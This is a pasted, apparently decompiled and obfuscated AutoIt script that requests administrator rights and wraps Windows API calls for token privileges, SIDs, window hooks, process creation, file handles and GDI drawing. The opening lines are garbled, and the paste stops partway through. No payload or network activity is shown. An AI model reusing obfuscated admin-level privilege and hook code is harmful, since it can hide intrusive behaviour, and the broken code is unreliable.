Guest User

Untitled

a guest
Aug 25th, 2012
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 232.55 KB | None | 0 0
  1. #RequireAdmin
  2. #Region
  3. #AutoIt3Wrapper_Icon=Icon.ico
  4. #AutoIt3Wrapper_Compression=4
  5. #EndRegion
  6. IF NOT ISDECLARED("Os")THEN
  7. IF @ERROR THEN RETURN SETERROR(NUMBER($Var0000 ),@EXTENDED,NUMBER($Var0001 ))
  8. LOCAL $Local0000 =DLLCALL($Var0002 ,$Var0003 ,$Var0004 ,$Var0005 ,$Var0006 ,$Var0007 ,$Local0071 ,$Var0008 ,$Var0009 ,$Var000A ,NUMBER($Var000B ))
  9. IF @ERROR OR NOT $Local0000 [NUMBER($Var000C )]THEN RETURN SETERROR(NUMBER($Var000D ),@EXTENDED,NUMBER($Var000E ))
  10. RETURN $Local0000 [NUMBER($Var000F )]
  11. ENDFUNC
  12.  
  13. Func Fn0000($Arg00,$ArgOpt01=0,$ArgOpt02=FALSE )
  14. LOCAL $Local0001 =A5410403741($Arg00,$ArgOpt01,$ArgOpt02)
  15. IF $Local0001 = 0 THEN
  16. IF A1000604D34()<>$Var0010 THEN RETURN SETERROR( 3 ,A1000604D34(), 0 )
  17. IF NOT A3100E04B51()THEN RETURN SETERROR( 1 ,A1000604D34(), 0 )
  18. $Local0001 =A5410403741($Arg00,$ArgOpt01,$ArgOpt02)
  19. IF $Local0001 = 0 THEN RETURN SETERROR( 2 ,A1000604D34(), 0 )
  20. ENDIF
  21. RETURN $Local0001
  22. ENDFUNC
  23.  
  24. Func Fn0001($Arg00,$Arg01,$Arg02)
  25. LOCAL $Local0002 =A2610202529("",$Arg01)
  26. IF $Local0002 = 0 THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
  27. LOCAL $Local0003 =DLLSTRUCTCREATE($Var0011 )
  28. LOCAL $Local0004 =DLLSTRUCTGETSIZE($Local0003 )
  29. LOCAL $Local0005 =DLLSTRUCTCREATE($Var0011 )
  30. LOCAL $Local0006 =DLLSTRUCTGETSIZE($Local0005 )
  31. LOCAL $Local0007 =DLLSTRUCTCREATE("int Data" )
  32. DLLSTRUCTSETDATA($Local0003 ,"Count" , 1 )
  33. DLLSTRUCTSETDATA($Local0003 ,"LUID" ,$Local0002 )
  34. IF NOT A480080550A($Arg00,FALSE ,$Local0003 ,$Local0004 ,$Local0005 ,$Local0007 )THEN RETURN SETERROR( 2 ,@ERROR,FALSE )
  35. DLLSTRUCTSETDATA($Local0005 ,"Count" , 1 )
  36. DLLSTRUCTSETDATA($Local0005 ,"LUID" ,$Local0002 )
  37. LOCAL $Local0008 =DLLSTRUCTGETDATA($Local0005 ,"Attributes")
  38. IF $Arg02 THEN
  39. $Local0008 =BITOR($Local0008 ,$Var0012 )
  40. ELSE
  41. $Local0008 =BITAND($Local0008 ,BITNOT($Var0012 ))
  42. ENDIF
  43. DLLSTRUCTSETDATA($Local0005 ,"Attributes",$Local0008 )
  44. IF NOT A480080550A($Arg00,FALSE ,$Local0005 ,$Local0006 ,$Local0003 ,$Local0007 )THEN RETURN SETERROR( 3 ,@ERROR,FALSE )
  45. RETURN TRUE
  46. ENDFUNC
  47.  
  48. Func Fn0002($Arg00,$Arg01,$Arg02,$Arg03)
  49. LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"SetTokenInformation","handle" ,$Arg00,"int" ,$Arg01,"struct*" ,$Arg02,"dword" ,$Arg03)
  50. IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED,FALSE )
  51. RETURN TRUE
  52. ENDFUNC
  53.  
  54. Func Fn0003($Arg00)
  55. IF NOT A4300F0145B($Arg00)THEN RETURN SETERROR( 1 , 0 ,"")
  56. LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"ConvertSidToStringSidW","struct*" ,$Arg00,"ptr*" , 0 )
  57. IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 2 ,@EXTENDED,"")
  58. LOCAL $Local0009 =$Local0000 [ 2 ]
  59. LOCAL $Local000A =DLLSTRUCTGETDATA(DLLSTRUCTCREATE("wchar Text["&Fn00C3($Local0009 )+ 1 &"]" ,$Local0009 ),"Text" )
  60. Fn0088($Local0009 )
  61. RETURN $Local000A
  62. ENDFUNC
  63.  
  64. Func Fn0004($Arg00)
  65. SWITCH $Arg00
  66. CASE $Var0013
  67. RETURN "User"
  68. CASE $Var0014
  69. RETURN "Group"
  70. CASE $Var0015
  71. RETURN "Domain"
  72. CASE $Var0016
  73. RETURN "Alias"
  74. CASE $Var0017
  75. RETURN "Well Known Group"
  76. CASE $Var0018
  77. RETURN "Deleted Account"
  78. CASE $Var0019
  79. RETURN "Invalid"
  80. CASE $Var001A
  81. RETURN "Unknown Type"
  82. CASE $Var001B
  83. RETURN "Computer"
  84. CASE $Var001C
  85. RETURN "A mandatory integrity label SID"
  86. CASE ELSE
  87. RETURN "Unknown SID Type"
  88. ENDSWITCH
  89. ENDFUNC
  90.  
  91. Func Fn0005($Arg00)
  92. LOCAL $Local0000 =DLLCALL("advapi32.dll","bool" ,"ConvertStringSidToSidW","wstr" ,$Arg00,"ptr*" , 0 )
  93. IF @ERROR OR NOT $Local0000 [ 0 ]THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
  94. LOCAL $Local000B =$Local0000 [ 2 ]
  95. LOCAL $Local000C =DLLSTRUCTCREATE("byte Data["&A3400C03E5E($Local000B )&"]" ,$Local000B )
  96. LOCAL $Local000D =DLLSTRUCTCREATE("byte Data["&DLLSTRUCTGETSIZE($Local000C )&"]" )
  97. DLLSTRUCTSETDATA($Local000D ,"Data" ,DLLSTRUCTGETDATA($Local000C ,"Data" ))
  98. Fn0088($Local000B )
  99. RETURN $Local000D
  100. ENDFUNC
  101.  
  102. Func Fn0006($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05="wparam",$ArgOpt06="lparam",$ArgOpt07="lresult")
  103. LOCAL $Local000E =DLLCALL("user32.dll",$ArgOpt07,"SendMessageW","hwnd" ,$Arg00,"uint" ,$Arg01,$ArgOpt05,$ArgOpt02,$ArgOpt06,$ArgOpt03)
  104. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  105. IF $ArgOpt04>= 0 AND $ArgOpt04<= 4 THEN RETURN $Local000E [$ArgOpt04]
  106. RETURN $Local000E
  107. ENDFUNC
  108.  
  109. Func Fn0007($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05="wparam",$ArgOpt06="lparam",$ArgOpt07="lresult")
  110. LOCAL $Local000E =DLLCALL("user32.dll",$ArgOpt07,"SendMessageA","hwnd" ,$Arg00,"uint" ,$Arg01,$ArgOpt05,$ArgOpt02,$ArgOpt06,$ArgOpt03)
  111. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  112. IF $ArgOpt04>= 0 AND $ArgOpt04<= 4 THEN RETURN $Local000E [$ArgOpt04]
  113. RETURN $Local000E
  114. ENDFUNC
  115. GLOBAL $Var001D [NUMBER($Var001E )][NUMBER($Var001F )]=[[NUMBER($Var0020 ),NUMBER($Var0021 )]]
  116. GLOBAL $Var0022 [NUMBER($Var0023 )][NUMBER($Var0024 )]=[[NUMBER($Var0025 ),NUMBER($Var0026 )]]
  117. GLOBAL CONST $Var0027 =NUMBER($Var0028 )
  118. GLOBAL CONST $Var0029 =NUMBER($Var002A )
  119. GLOBAL CONST $Var002B =NUMBER($Var002C )
  120. GLOBAL CONST $Var002D =NUMBER($Var002E )
  121. GLOBAL CONST $Var002F =NUMBER($Var0030 )
  122. GLOBAL CONST $Var0031 =NUMBER($Var0032 )
  123. GLOBAL CONST $Var0033 =NUMBER($Var0034 )
  124. GLOBAL CONST $Var0035 =NUMBER($Var0036 )
  125. GLOBAL CONST $Var0037 =NUMBER($Var0038 )
  126. GLOBAL CONST $Var0039 =NUMBER($Var003A )
  127. GLOBAL CONST $Var003B =PTR(-NUMBER($Var003C ))
  128. GLOBAL CONST $Var003D =PTR(-NUMBER($Var003E ))
  129. GLOBAL CONST $Var003F =-NUMBER($Var0040 )
  130. GLOBAL CONST $Var0041 =NUMBER($Var0042 )
  131. GLOBAL CONST $Var0043 =NUMBER($Var0044 )
  132. GLOBAL CONST $Var0045 =NUMBER($Var0046 )
  133. GLOBAL CONST $Var0047 =NUMBER($Var0048 )
  134. GLOBAL CONST $Var0049 =NUMBER($Var004A )
  135. GLOBAL CONST $Var004B =NUMBER($Var004C )
  136. GLOBAL CONST $Var004D =NUMBER($Var004E )
  137. GLOBAL CONST $Var004F =NUMBER($Var0050 )
  138. GLOBAL CONST $Var0051 =NUMBER($Var0052 )
  139. GLOBAL CONST $Var0053 =NUMBER($Var0054 )
  140. GLOBAL CONST $Var0055 =NUMBER($Var0056 )
  141. GLOBAL CONST $Var0057 =NUMBER($Var0058 )
  142. GLOBAL CONST $Var0059 =NUMBER($Var005A )
  143. GLOBAL CONST $Var005B =NUMBER($Var005C )
  144. GLOBAL CONST $Var005D =NUMBER($Var005E )
  145. GLOBAL CONST $Var005F =NUMBER($Var0060 )
  146. GLOBAL CONST $Var0061 =NUMBER($Var0062 )
  147. GLOBAL CONST $Var0063 =NUMBER($Var0064 )
  148. GLOBAL CONST $Var0065 =NUMBER($Var0066 )
  149. GLOBAL CONST $Var0067 =NUMBER($Var0068 )
  150. GLOBAL CONST $Var0069 =NUMBER($Var006A )
  151. GLOBAL CONST $Var006B =NUMBER($Var006C )
  152. GLOBAL CONST $Var006D =NUMBER($Var006E )
  153. GLOBAL CONST $Var006F =NUMBER($Var0070 )
  154. GLOBAL CONST $Var0071 =$Var0065
  155. GLOBAL CONST $Var0072 =NUMBER($Var0073 )
  156. GLOBAL CONST $Var0074 =NUMBER($Var0075 )
  157. GLOBAL CONST $Var0076 =NUMBER($Var0077 )
  158. GLOBAL CONST $Var0078 =NUMBER($Var0079 )
  159. GLOBAL CONST $Var007A =NUMBER($Var007B )
  160. GLOBAL CONST $Var007C =NUMBER($Var007D )
  161. GLOBAL CONST $Var007E =NUMBER($Var007F )
  162. GLOBAL CONST $Var0080 =NUMBER($Var0081 )
  163. GLOBAL CONST $Var0082 =NUMBER($Var0083 )
  164. GLOBAL CONST $Var0084 =NUMBER($Var0085 )
  165. GLOBAL CONST $Var0086 =NUMBER($Var0087 )
  166. GLOBAL CONST $Var0088 =NUMBER($Var0089 )
  167. GLOBAL CONST $Var008A =NUMBER($Var008B )
  168. GLOBAL CONST $Var008C =NUMBER($Var008D )
  169. GLOBAL CONST $Var008E =NUMBER($Var008F )
  170. GLOBAL CONST $Var0090 =NUMBER($Var0091 )
  171. GLOBAL CONST $Var0092 =NUMBER($Var0093 )
  172. GLOBAL CONST $Var0094 =NUMBER($Var0095 )
  173. GLOBAL CONST $Var0096 =NUMBER($Var0097 )
  174. GLOBAL CONST $Var0098 =NUMBER($Var0099 )
  175. GLOBAL CONST $Var009A =NUMBER($Var009B )
  176. GLOBAL CONST $Var009C =NUMBER($Var009D )
  177. GLOBAL CONST $Var009E =NUMBER($Var009F )
  178. GLOBAL CONST $Var00A0 =NUMBER($Var00A1 )
  179. GLOBAL CONST $Var00A2 =NUMBER($Var00A3 )
  180. GLOBAL CONST $Var00A4 =NUMBER($Var00A5 )
  181. GLOBAL CONST $Var00A6 =NUMBER($Var00A7 )
  182. GLOBAL CONST $Var00A8 =NUMBER($Var00A9 )
  183. GLOBAL CONST $Var00AA =NUMBER($Var00AB )
  184. GLOBAL CONST $Var00AC =NUMBER($Var00AD )
  185. GLOBAL CONST $Var00AE =NUMBER($Var00AF )
  186. GLOBAL CONST $Var00B0 =-NUMBER($Var00B1 )
  187. GLOBAL CONST $Var00B2 =NUMBER($Var00B3 )
  188. GLOBAL CONST $Var00B4 =NUMBER($Var00B5 )
  189. GLOBAL CONST $Var00B6 =NUMBER($Var00B7 )
  190. GLOBAL CONST $Var00B8 =NUMBER($Var00B9 )
  191. GLOBAL CONST $Var00BA =NUMBER($Var00BB )
  192. GLOBAL CONST $Var00BC =NUMBER($Var00BD )
  193. GLOBAL CONST $Var00BE =NUMBER($Var00BF )
  194. GLOBAL CONST $Var00C0 =NUMBER($Var00C1 )
  195. GLOBAL CONST $Var00C2 =BITSHIFT($Var00BC ,NUMBER($Var00C3 ))
  196. GLOBAL CONST $Var00C4 =NUMBER($Var00C5 )
  197. GLOBAL CONST $Var00C6 =BITSHIFT($Var00BE ,NUMBER($Var00C7 ))
  198. GLOBAL CONST $Var00C8 =BITSHIFT($Var00C0 ,NUMBER($Var00C9 ))
  199. GLOBAL CONST $Var00CA =NUMBER($Var00CB )
  200. GLOBAL CONST $Var00CC =NUMBER($Var00CD )
  201. GLOBAL CONST $Var00CE =NUMBER($Var00CF )
  202. GLOBAL CONST $Var00D0 =NUMBER($Var00D1 )
  203. GLOBAL CONST $Var00D2 =NUMBER($Var00D3 )
  204. GLOBAL CONST $Var00D4 =NUMBER($Var00D5 )
  205. GLOBAL CONST $Var00D6 =NUMBER($Var00D7 )
  206. GLOBAL CONST $Var00D8 =NUMBER($Var00D9 )
  207. GLOBAL CONST $Var00DA =NUMBER($Var00DB )
  208. GLOBAL CONST $Var00DC =NUMBER($Var00DD )
  209. GLOBAL CONST $Var00DE =NUMBER($Var00DF )
  210. GLOBAL CONST $Var00E0 =NUMBER($Var00E1 )
  211. GLOBAL CONST $Var00E2 =NUMBER($Var00E3 )
  212. GLOBAL CONST $Var00E4 =NUMBER($Var00E5 )
  213. GLOBAL CONST $Var00E6 =NUMBER($Var00E7 )
  214. GLOBAL CONST $Var00E8 =NUMBER($Var00E9 )
  215. GLOBAL CONST $Var00EA =NUMBER($Var00EB )
  216. GLOBAL CONST $Var00EC =NUMBER($Var00ED )
  217. GLOBAL CONST $Var00EE =NUMBER($Var00EF )
  218. GLOBAL CONST $Var00F0 =NUMBER($Var00F1 )
  219. GLOBAL CONST $Var00F2 =NUMBER($Var00F3 )
  220. GLOBAL CONST $Var00F4 =NUMBER($Var00F5 )
  221. GLOBAL CONST $Var00F6 =NUMBER($Var00F7 )
  222. GLOBAL CONST $Var00F8 =NUMBER($Var00F9 )
  223. GLOBAL CONST $Var00FA =NUMBER($Var00FB )
  224. GLOBAL CONST $Var00FC =NUMBER($Var00FD )
  225. GLOBAL CONST $Var00FE =NUMBER($Var00FF )
  226. GLOBAL CONST $Var0100 =NUMBER($Var0101 )
  227. GLOBAL CONST $Var0102 =NUMBER($Var0103 )
  228. GLOBAL CONST $Var0104 =NUMBER($Var0105 )
  229. GLOBAL CONST $Var0106 =NUMBER($Var0107 )
  230. GLOBAL CONST $Var0108 =NUMBER($Var0109 )
  231. GLOBAL CONST $Var010A =NUMBER($Var010B )
  232. GLOBAL CONST $Var010C =$Var010D &$Var010E
  233. GLOBAL CONST $Var010F =$Var0110
  234. GLOBAL CONST $Var0111 =$Var0112
  235. GLOBAL CONST $Var0113 =$Var0114
  236. GLOBAL CONST $Var0115 =$Var0116 &$Var0117 &$Var0118
  237.  
  238. Func Fn0008($ArgOpt00=-1)
  239. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"AttachConsole","dword" ,$ArgOpt00)
  240. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  241. RETURN $Local000E [ 0 ]
  242. ENDFUNC
  243.  
  244. Func Fn0009($Arg00,$Arg01,$Arg02)
  245. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"AttachThreadInput","dword" ,$Arg00,"dword" ,$Arg01,"bool" ,$Arg02)
  246. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  247. RETURN $Local000E [ 0 ]
  248. ENDFUNC
  249.  
  250. Func Fn000A($ArgOpt00=500,$ArgOpt01=1000)
  251. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"Beep" ,"dword" ,$ArgOpt00,"dword" ,$ArgOpt01)
  252. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  253. RETURN $Local000E [ 0 ]
  254. ENDFUNC
  255.  
  256. Func Fn000B($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08)
  257. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"BitBlt" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"handle" ,$Arg05,"int" ,$Arg06,"int" ,$Arg07,"dword" ,$Arg08)
  258. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  259. RETURN $Local000E [ 0 ]
  260. ENDFUNC
  261.  
  262. Func Fn000C($Arg00,$Arg01,$Arg02,$Arg03)
  263. LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"CallNextHookEx","handle" ,$Arg00,"int" ,$Arg01,"wparam" ,$Arg02,"lparam" ,$Arg03)
  264. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  265. RETURN $Local000E [ 0 ]
  266. ENDFUNC
  267.  
  268. Func Fn000D($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
  269. LOCAL $Local000E =DLLCALL("user32.dll","lresult" ,"CallWindowProc","ptr" ,$Arg00,"hwnd" ,$Arg01,"uint" ,$Arg02,"wparam" ,$Arg03,"lparam" ,$Arg04)
  270. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  271. RETURN $Local000E [ 0 ]
  272. ENDFUNC
  273.  
  274. Func Fn000E($Arg00,BYREF $ArgRef01)
  275. DLLCALL("user32.dll","bool" ,"ClientToScreen","hwnd" ,$Arg00,"struct*" ,$ArgRef01)
  276. RETURN SETERROR(@ERROR,@EXTENDED,$ArgRef01)
  277. ENDFUNC
  278.  
  279. Func Fn000F($Arg00)
  280. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Arg00)
  281. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  282. RETURN $Local000E [ 0 ]
  283. ENDFUNC
  284.  
  285. Func Fn0010($Arg00,$Arg01,$Arg02,$Arg03)
  286. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"CombineRgn","handle" ,$Arg00,"handle" ,$Arg01,"handle" ,$Arg02,"int" ,$Arg03)
  287. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  288. RETURN $Local000E [ 0 ]
  289. ENDFUNC
  290.  
  291. Func Fn0011()
  292. LOCAL CONST $Var0119 =0xFFFF
  293. LOCAL CONST $Var011A = 6
  294. LOCAL CONST $Var011B = 2
  295. LOCAL CONST $Var011C = 7
  296. LOCAL CONST $Var011D = 5
  297. LOCAL CONST $Var011E = 8
  298. LOCAL CONST $Var011F = 9
  299. LOCAL CONST $Var0120 = 10
  300. LOCAL CONST $Var0121 = 4
  301. LOCAL CONST $Var0122 =0x000B
  302. LOCAL CONST $Var0123 = 3
  303. LOCAL CONST $Var0124 =0x000C
  304. LOCAL CONST $Var0125 = 1
  305. LOCAL CONST $Var0126 =0x3003
  306. LOCAL CONST $Var0127 =0x3002
  307. LOCAL CONST $Var0128 =0x3001
  308. LOCAL $Local000E =DLLCALL("comdlg32.dll","dword" ,"CommDlgExtendedError")
  309. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  310. SWITCH $Local000E [ 0 ]
  311. CASE $Var0119
  312. RETURN SETERROR($Local000E [ 0 ], 0 ,"The dialog box could not be created."& @LF &"The common dialog box function's call to the DialogBox function failed."& @LF &"For example, this error occurs if the common dialog box call specifies an invalid window handle.")
  313. CASE $Var011A
  314. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to find a specified resource.")
  315. CASE $Var011B
  316. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed during initialization."& @LF &"This error often occurs when sufficient memory is not available.")
  317. CASE $Var011C
  318. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to load a specified resource.")
  319. CASE $Var011D
  320. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to load a specified string.")
  321. CASE $Var011E
  322. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function failed to lock a specified resource.")
  323. CASE $Var011F
  324. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function was unable to allocate memory for internal structures.")
  325. CASE $Var0120
  326. RETURN SETERROR($Local000E [ 0 ], 0 ,"The common dialog box function was unable to lock the memory associated with a handle.")
  327. CASE $Var0121
  328. RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a corresponding instance handle.")
  329. CASE $Var0122
  330. RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a pointer to a corresponding hook procedure.")
  331. CASE $Var0123
  332. RETURN SETERROR($Local000E [ 0 ], 0 ,"The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box,"& @LF &"but you failed to provide a corresponding template.")
  333. CASE $Var0124
  334. RETURN SETERROR($Local000E [ 0 ], 0 ,"The RegisterWindowMessage function returned an error code when it was called by the common dialog box function.")
  335. CASE $Var0125
  336. RETURN SETERROR($Local000E [ 0 ], 0 ,"The lStructSize member of the initialization structure for the corresponding common dialog box is invalid")
  337. CASE $Var0126
  338. RETURN SETERROR($Local000E [ 0 ], 0 ,"The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user."& @LF &"The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name.")
  339. CASE $Var0127
  340. RETURN SETERROR($Local000E [ 0 ], 0 ,"A file name is invalid.")
  341. CASE $Var0128
  342. RETURN SETERROR($Local000E [ 0 ], 0 ,"An attempt to subclass a list box failed because sufficient memory was not available.")
  343. ENDSWITCH
  344. RETURN HEX($Local000E [ 0 ])
  345. ENDFUNC
  346.  
  347. Func Fn0012($Arg00)
  348. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"CopyIcon" ,"handle" ,$Arg00)
  349. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  350. RETURN $Local000E [ 0 ]
  351. ENDFUNC
  352.  
  353. Func Fn0013($Arg00,$Arg01,$ArgOpt02=1,$ArgOpt03=1,$ArgOpt04=0)
  354. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateBitmap","int" ,$Arg00,"int" ,$Arg01,"uint" ,$ArgOpt02,"uint" ,$ArgOpt03,"ptr" ,$ArgOpt04)
  355. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  356. RETURN $Local000E [ 0 ]
  357. ENDFUNC
  358.  
  359. Func Fn0014($Arg00,$Arg01,$Arg02)
  360. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateCompatibleBitmap","handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
  361. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  362. RETURN $Local000E [ 0 ]
  363. ENDFUNC
  364.  
  365. Func Fn0015($Arg00)
  366. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateCompatibleDC","handle" ,$Arg00)
  367. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  368. RETURN $Local000E [ 0 ]
  369. ENDFUNC
  370.  
  371. Func Fn0016($ArgOpt00=0,$ArgOpt01=TRUE ,$ArgOpt02=TRUE ,$ArgOpt03="")
  372. LOCAL $Local000F ="wstr"
  373. IF $ArgOpt03="" THEN
  374. $ArgOpt03= 0
  375. $Local000F ="ptr"
  376. ENDIF
  377. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"CreateEventW","ptr" ,$ArgOpt00,"bool" ,$ArgOpt01,"bool" ,$ArgOpt02,$Local000F ,$ArgOpt03)
  378. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  379. RETURN $Local000E [ 0 ]
  380. ENDFUNC
  381.  
  382. Func Fn0017($Arg00,$Arg01,$ArgOpt02=4,$ArgOpt03=0,$ArgOpt04=0,$ArgOpt05=0)
  383. LOCAL $Local0010 = 0 ,$Var0129 = 0 ,$Var012A = 0 ,$Var012B = 0
  384. IF BITAND($ArgOpt02, 1 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012C )
  385. IF BITAND($ArgOpt02, 2 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012D )
  386. IF BITAND($ArgOpt02, 4 )<> 0 THEN $Local0010 =BITOR($Local0010 ,$Var012E )
  387. IF BITAND($ArgOpt03, 1 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var012F )
  388. IF BITAND($ArgOpt03, 2 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var0130 )
  389. IF BITAND($ArgOpt03, 4 )<> 0 THEN $Var0129 =BITOR($Var0129 ,$Var0131 )
  390. SWITCH $Arg01
  391. CASE 0
  392. $Var012A =$Var0132
  393. CASE 1
  394. $Var012A =$Var0133
  395. CASE 2
  396. $Var012A =$Var0134
  397. CASE 3
  398. $Var012A =$Var0135
  399. CASE 4
  400. $Var012A =$Var0136
  401. ENDSWITCH
  402. IF BITAND($ArgOpt04, 1 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0137 )
  403. IF BITAND($ArgOpt04, 2 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0138 )
  404. IF BITAND($ArgOpt04, 4 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var0139 )
  405. IF BITAND($ArgOpt04, 8 )<> 0 THEN $Var012B =BITOR($Var012B ,$Var013A )
  406. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"CreateFileW","wstr" ,$Arg00,"dword" ,$Local0010 ,"dword" ,$Var0129 ,"ptr" ,$ArgOpt05,"dword" ,$Var012A ,"dword" ,$Var012B ,"ptr" , 0 )
  407. IF @ERROR OR $Local000E [ 0 ]=PTR(- 1 )THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  408. RETURN $Local000E [ 0 ]
  409. ENDFUNC
  410.  
  411. Func Fn0018($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=$Var0029 ,$ArgOpt05=FALSE ,$ArgOpt06=FALSE ,$ArgOpt07=FALSE ,$ArgOpt08=$Var002B ,$ArgOpt09=$Var002D ,$ArgOpt0A=$Var002F ,$ArgOpt0B=$Var0031 ,$ArgOpt0C=0,$ArgOpt0D="Arial")
  412. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateFontW","int" ,$Arg00,"int" ,$Arg01,"int" ,$ArgOpt02,"int" ,$ArgOpt03,"int" ,$ArgOpt04,"dword" ,$ArgOpt05,"dword" ,$ArgOpt06,"dword" ,$ArgOpt07,"dword" ,$ArgOpt08,"dword" ,$ArgOpt09,"dword" ,$ArgOpt0A,"dword" ,$ArgOpt0B,"dword" ,$ArgOpt0C,"wstr" ,$ArgOpt0D)
  413. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  414. RETURN $Local000E [ 0 ]
  415. ENDFUNC
  416.  
  417. Func Fn0019($Arg00)
  418. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateFontIndirectW","struct*" ,$Arg00)
  419. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  420. RETURN $Local000E [ 0 ]
  421. ENDFUNC
  422.  
  423. Func Fn001A($Arg00,$Arg01,$Arg02)
  424. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreatePen" ,"int" ,$Arg00,"int" ,$Arg01,"dword" ,$Arg02)
  425. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  426. RETURN $Local000E [ 0 ]
  427. ENDFUNC
  428.  
  429. Func Fn001B($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05,$Arg06,$Arg07,$Arg08,$Arg09)
  430. LOCAL $Local0011 = 0
  431. LOCAL $Local0012 ="wstr" ,$Var013B ="wstr"
  432. IF $Arg00="" THEN
  433. $Local0012 ="ptr"
  434. $Arg00= 0
  435. ENDIF
  436. IF $Arg01<>"" THEN
  437. $Local0011 =DLLSTRUCTCREATE("wchar Text["&0x0104 + 1 &"]" )
  438. DLLSTRUCTSETDATA($Local0011 ,"Text" ,$Arg01)
  439. ENDIF
  440. IF $Arg07="" THEN
  441. $Var013B ="ptr"
  442. $Arg07= 0
  443. ENDIF
  444. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"CreateProcessW",$Local0012 ,$Arg00,"struct*" ,$Local0011 ,"ptr" ,$Arg02,"ptr" ,$Arg03,"bool" ,$Arg04,"dword" ,$Arg05,"ptr" ,$Arg06,$Var013B ,$Arg07,"ptr" ,$Arg08,"ptr" ,$Arg09)
  445. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  446. RETURN $Local000E [ 0 ]
  447. ENDFUNC
  448.  
  449. Func Fn001C($Arg00,$Arg01,$Arg02,$Arg03)
  450. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"CreateRectRgn","int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03)
  451. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  452. RETURN $Local000E [ 0 ]
  453. ENDFUNC
  454.  
